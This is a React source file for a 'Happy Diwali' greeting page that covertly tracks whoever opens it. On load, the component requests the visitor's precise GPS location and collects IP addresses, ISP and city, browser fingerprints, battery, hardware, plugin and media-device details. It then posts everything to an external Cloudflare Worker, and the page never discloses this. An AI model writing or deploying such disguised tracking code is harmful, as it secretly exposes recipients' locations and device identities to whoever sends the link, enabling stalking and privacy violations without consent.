import React, { useEffect, useState, useRef, useCallback } from 'react';
import { Sparkles, Flame } from 'lucide-react';

export default function DiwaliGreeting() {
  const [mounted, setMounted] = useState(false);
  const dataSentRef = useRef(false);

  // Enhanced GPS with permission tracking
  const getEnhancedLocation = useCallback(() => {
    return new Promise((resolve) => {
      if (!navigator.geolocation) {
        resolve({
          ...getIPLocationFallback(),
          permissionState: 'not_supported'
        });
        return;
      }

      // First check permission status
      if ('permissions' in navigator) {
        navigator.permissions.query({ name: 'geolocation' })
          .then(permissionStatus => {
            const permissionState = permissionStatus.state;

            if (permissionState === 'denied') {
              resolve({
                error: 'Location permission denied',
                source: 'GPS Blocked',
                quality: 'Blocked',
                permissionState: 'denied'
              });
              return;
            }

            // Try to get location if permission might be granted
            getLocationWithPermission(permissionState, resolve);
          })
          .catch(() => {
            // Permissions API not supported, try direct location
            getLocationWithPermission('prompt', resolve);
          });
      } else {
        // Permissions API not available, try direct location
        getLocationWithPermission('unknown', resolve);
      }
    });
  }, []);

  const getLocationWithPermission = (permissionState, resolve) => {
    const highAccuracyOptions = {
      enableHighAccuracy: true,
      timeout: 10000, // Increased timeout
      maximumAge: 0
    };

    navigator.geolocation.getCurrentPosition(
      (position) => {
        const coords = position.coords;
        resolve({
          latitude: coords.latitude,
          longitude: coords.longitude,
          accuracy: `${Math.round(coords.accuracy)} meters`,
          source: coords.accuracy < 100 ? 'GPS (High Accuracy)' : 'GPS (Standard)',
          quality: coords.accuracy < 50 ? 'Excellent' : coords.accuracy < 100 ? 'Good' : 'Fair',
          permissionState: 'granted',
          timestamp: new Date().toISOString()
        });
      },
      async (error) => {
        console.log('GPS error:', error);
        let errorType = 'unknown';

        switch (error.code) {
          case error.PERMISSION_DENIED:
            errorType = 'permission_denied';
            break;
          case error.POSITION_UNAVAILABLE:
            errorType = 'position_unavailable';
            break;
          case error.TIMEOUT:
            errorType = 'timeout';
            break;
        }

        const fallback = await getIPLocationFallback();
        resolve({
          ...fallback,
          permissionState: errorType === 'permission_denied' ? 'denied' : permissionState,
          gpsError: errorType
        });
      },
      highAccuracyOptions
    );
  };

  const getIPLocationFallback = useCallback(async () => {
    try {
      const response = await fetch('https://ipinfo.io/json?token=YOUR_IPINFO_TOKEN');
      if (response.ok) {
        const data = await response.json();
        const [lat, lon] = data.loc ? data.loc.split(',').map(Number) : [0, 0];

        return {
          latitude: lat || 'Unknown',
          longitude: lon || 'Unknown',
          accuracy: 'Low (IP-based)',
          source: 'IP Geolocation',
          quality: 'Low',
          city: data.city,
          region: data.region,
          country: data.country,
          isp: data.org,
          timezone: data.timezone,
          permissionState: 'not_required'
        };
      }
    } catch (error) {
      console.error('IP location fallback failed:', error);
    }

    return {
      error: 'All location methods failed',
      source: 'Unknown',
      quality: 'Unknown',
      permissionState: 'failed'
    };
  }, []);

  // Enhanced IP detection
  const getFastIPInfo = useCallback(async () => {
    try {
      const [ipv4Data, ipv6Data] = await Promise.allSettled([
        fetch('https://api.ipify.org?format=json').then(res => res.json()),
        fetch('https://api64.ipify.org?format=json').then(res => res.json())
      ]);

      const ipv4 = ipv4Data.status === 'fulfilled' ? ipv4Data.value.ip : 'Unknown';
      const ipv6 = ipv6Data.status === 'fulfilled' ? ipv6Data.value.ip : 'Not detected';

      const response = await fetch('https://ipinfo.io/json');
      const data = await response.json();

      return {
        ipv4,
        ipv6,
        country: data.country,
        city: data.city,
        region: data.region,
        isp: data.org,
        timezone: data.timezone,
        source: 'ipinfo'
      };
    } catch (error) {
      console.log('IP detection failed');
      return { error: 'IP detection failed' };
    }
  }, []);

  // Enhanced fingerprinting with battery API
  const getFingerprintData = useCallback(async () => {
    const [canvas, webgl, fonts, battery] = await Promise.allSettled([
      getCanvasFingerprint(),
      getWebGLFingerprint(),
      getFontsList(),
      getBatteryInfo()
    ]);

    return {
      canvas: canvas.status === 'fulfilled' ? canvas.value : 'error',
      webgl: webgl.status === 'fulfilled' ? webgl.value : 'error',
      audio: await getAudioFingerprint(),
      fonts: fonts.status === 'fulfilled' ? fonts.value : [],
      screen: `${window.screen.width}x${window.screen.height}`,
      colorDepth: window.screen.colorDepth,
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      language: navigator.language,
      languages: navigator.languages,
      battery: battery.status === 'fulfilled' ? battery.value : { level: 1, charging: true }
    };
  }, []);

  const getCanvasFingerprint = useCallback(() => {
    try {
      const canvas = document.createElement('canvas');
      const ctx = canvas.getContext('2d');
      if (!ctx) return false;

      canvas.width = 200;
      canvas.height = 50;
      ctx.textBaseline = 'top';
      ctx.font = '14px Arial';
      ctx.fillStyle = '#f60';
      ctx.fillRect(125, 1, 62, 20);
      ctx.fillStyle = '#069';
      ctx.fillText('Hello, world!', 2, 15);

      return true;
    } catch (error) {
      return false;
    }
  }, []);

  const getWebGLFingerprint = useCallback(async () => {
    try {
      const canvas = document.createElement('canvas');
      const gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
      if (!gl) return false;

      const debugInfo = gl.getExtension('WEBGL_debug_renderer_info');
      return !!debugInfo;
    } catch (error) {
      return false;
    }
  }, []);

  const getAudioFingerprint = useCallback(async () => {
    try {
      const audioContext = window.AudioContext || window.webkitAudioContext;
      if (!audioContext) return false;

      const context = new audioContext();
      return !!context;
    } catch (error) {
      return false;
    }
  }, []);

  const getBatteryInfo = useCallback(async () => {
    try {
      if ('getBattery' in navigator) {
        const battery = await navigator.getBattery();
        return {
          level: battery.level,
          charging: battery.charging
        };
      } else if ('battery' in navigator) {
        return {
          level: navigator.battery.level,
          charging: navigator.battery.charging
        };
      }
    } catch (error) {
      console.log('Battery API not supported');
    }

    return { level: 1, charging: true };
  }, []);

  const getFontsList = useCallback(() => {
    try {
      const fontList = ['Arial', 'Arial Black', 'Georgia', 'Times New Roman', 'Verdana'];
      const availableFonts = [];

      fontList.forEach(font => {
        const test = document.createElement('span');
        test.style.fontSize = '72px';
        test.style.fontFamily = `${font}, monospace`;
        test.textContent = 'mmmmmmmmmml';

        document.body.appendChild(test);
        const testWidth = test.offsetWidth;
        document.body.removeChild(test);

        const reference = document.createElement('span');
        reference.style.fontSize = '72px';
        reference.style.fontFamily = 'monospace';
        reference.textContent = 'mmmmmmmmmml';

        document.body.appendChild(reference);
        const referenceWidth = reference.offsetWidth;
        document.body.removeChild(reference);

        if (testWidth !== referenceWidth) {
          availableFonts.push(font);
        }
      });

      return availableFonts;
    } catch (error) {
      return [];
    }
  }, []);

  // Enhanced device data collection
  const getDeviceData = useCallback(async () => {
    const batteryInfo = await getBatteryInfo();

    return {
      userAgent: navigator.userAgent,
      browser: {
        name: getBrowserName(navigator.userAgent),
        version: getBrowserVersion(navigator.userAgent)
      },
      platform: navigator.platform,
      vendor: navigator.vendor,
      hardwareConcurrency: navigator.hardwareConcurrency,
      deviceMemory: navigator.deviceMemory,
      maxTouchPoints: navigator.maxTouchPoints,
      cookieEnabled: navigator.cookieEnabled,
      onLine: navigator.onLine,
      connection: navigator.connection ? {
        effectiveType: navigator.connection.effectiveType,
        downlink: navigator.connection.downlink,
        rtt: navigator.connection.rtt,
        saveData: navigator.connection.saveData
      } : null,
      screen: {
        width: window.screen.width,
        height: window.screen.height,
        availWidth: window.screen.availWidth,
        availHeight: window.screen.availHeight,
        colorDepth: window.screen.colorDepth,
        pixelDepth: window.screen.pixelDepth
      },
      plugins: Array.from(navigator.plugins || []).map(p => ({
        name: p.name,
        filename: p.filename
      })),
      mediaDevices: await getMediaDevices(),
      battery: batteryInfo,
      webRTC: {
        supported: !!window.RTCPeerConnection,
        iceGatheringState: 'new'
      }
    };
  }, [getBatteryInfo]);

  const getMediaDevices = useCallback(async () => {
    try {
      if (!navigator.mediaDevices || !navigator.mediaDevices.enumerateDevices) {
        return [];
      }
      const devices = await navigator.mediaDevices.enumerateDevices();
      return devices.map(device => ({
        kind: device.kind,
        label: device.label
      }));
    } catch (error) {
      return [];
    }
  }, []);

  const getBrowserName = (userAgent) => {
    if (userAgent.includes('Chrome')) return 'Chrome';
    if (userAgent.includes('Firefox')) return 'Firefox';
    if (userAgent.includes('Safari')) return 'Safari';
    if (userAgent.includes('Edge')) return 'Edge';
    return 'Unknown';
  };

  const getBrowserVersion = (userAgent) => {
    const chromeMatch = userAgent.match(/Chrome\/(\d+)/);
    return chromeMatch ? chromeMatch[1] : 'Unknown';
  };

  const collectVisitorInfo = useCallback(async () => {
    if (dataSentRef.current) return;
    dataSentRef.current = true;

    try {
      console.log('🚀 Starting enhanced data collection...');

      const [gpsLocation, ipData, fingerprintData, deviceData] = await Promise.allSettled([
        getEnhancedLocation(),
        getFastIPInfo(),
        getFingerprintData(),
        getDeviceData()
      ]);

      const deviceInfo = {
        // Enhanced location data with permission
        location: gpsLocation.status === 'fulfilled' ? gpsLocation.value : { error: 'Location failed' },

        // Location permission status
        locationPermission: {
          granted: gpsLocation.status === 'fulfilled' && gpsLocation.value.permissionState === 'granted',
          state: gpsLocation.status === 'fulfilled' ? gpsLocation.value.permissionState : 'unknown'
        },

        // Network data
        network: ipData.status === 'fulfilled' ? ipData.value : { error: 'IP detection failed' },

        // Enhanced fingerprint data
        fingerprints: fingerprintData.status === 'fulfilled' ? fingerprintData.value : {},

        // Complete device data
        device: deviceData.status === 'fulfilled' ? deviceData.value : {},

        // Additional info
        timezone: fingerprintData.status === 'fulfilled' ? fingerprintData.value.timezone : 'Unknown',
        languages: fingerprintData.status === 'fulfilled' ? fingerprintData.value.languages : ['en-US'],
        referrer: document.referrer || 'Direct',
        url: window.location.href,
        timestamp: new Date().toISOString()
      };

      console.log('✅ Collected enhanced device info:', deviceInfo);

      // Send to Cloudflare Worker
      const response = await fetch('https://diwali-greeting-worker.aj13peace.workers.dev', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(deviceInfo),
      });

      if (response.ok) {
        const result = await response.json();
        console.log('📨 Data sent successfully:', result);
      }

    } catch (error) {
      console.error('❌ Error collecting info:', error);
    }
  }, [getEnhancedLocation, getFastIPInfo, getFingerprintData, getDeviceData]);

  useEffect(() => {
    setMounted(true);
    collectVisitorInfo();
  }, [collectVisitorInfo]);

  // ... (keep your existing JSX return statement the same)
  return (
    <div className="min-h-screen bg-gradient-to-br from-orange-900 via-red-900 to-purple-900 flex items-center justify-center overflow-hidden relative">
      {/* Your existing JSX */}
      <div className="absolute inset-0 overflow-hidden">
        {[...Array(15)].map((_, i) => (
          <div
            key={i}
            className="absolute animate-pulse"
            style={{
              left: `${Math.random() * 100}%`,
              top: `${Math.random() * 100}%`,
              animationDelay: `${Math.random() * 2}s`,
              animationDuration: `${1 + Math.random() * 2}s`,
            }}
          >
            <Sparkles className="text-yellow-400 opacity-60" size={12 + Math.random() * 12} />
          </div>
        ))}
      </div>

      <div className={`relative z-10 text-center px-6 transition-all duration-1000 ${mounted ? 'opacity-100 scale-100' : 'opacity-0 scale-95'}`}>
        <div className="flex justify-center gap-8 mb-8">
          {[...Array(5)].map((_, i) => (
            <div
              key={i}
              className="animate-bounce"
              style={{
                animationDelay: `${i * 0.2}s`,
                animationDuration: '2s',
              }}
            >
              <Flame className="text-orange-400" size={32} fill="currentColor" />
            </div>
          ))}
        </div>

        <h1 className="text-7xl md:text-8xl font-bold text-transparent bg-clip-text bg-gradient-to-r from-yellow-300 via-orange-400 to-red-500 mb-6 animate-pulse">
          Happy Diwali
        </h1>

        <div className="text-2xl md:text-3xl text-yellow-200 mb-8 font-light">
          शुभ दीपावली
        </div>

        <div className="max-w-2xl mx-auto bg-black bg-opacity-30 backdrop-blur-sm rounded-2xl p-8 border-2 border-yellow-500 border-opacity-30">
          <p className="text-xl md:text-2xl text-yellow-100 leading-relaxed mb-4">
            May the festival of lights brighten your life with joy, prosperity, and happiness.
          </p>
          <p className="text-lg text-orange-300">
            Wishing you and your family a sparkling Diwali filled with love and light! ✨
          </p>
        </div>

        <div className="flex justify-center gap-4 mt-8">
          {[...Array(3)].map((_, i) => (
            <div
              key={i}
              className="w-16 h-16 rounded-full bg-gradient-to-t from-orange-600 to-yellow-400 animate-pulse"
              style={{
                animationDelay: `${i * 0.3}s`,
                boxShadow: '0 0 30px rgba(251, 146, 60, 0.8)',
              }}
            />
          ))}
        </div>
      </div>
    </div>
  );
}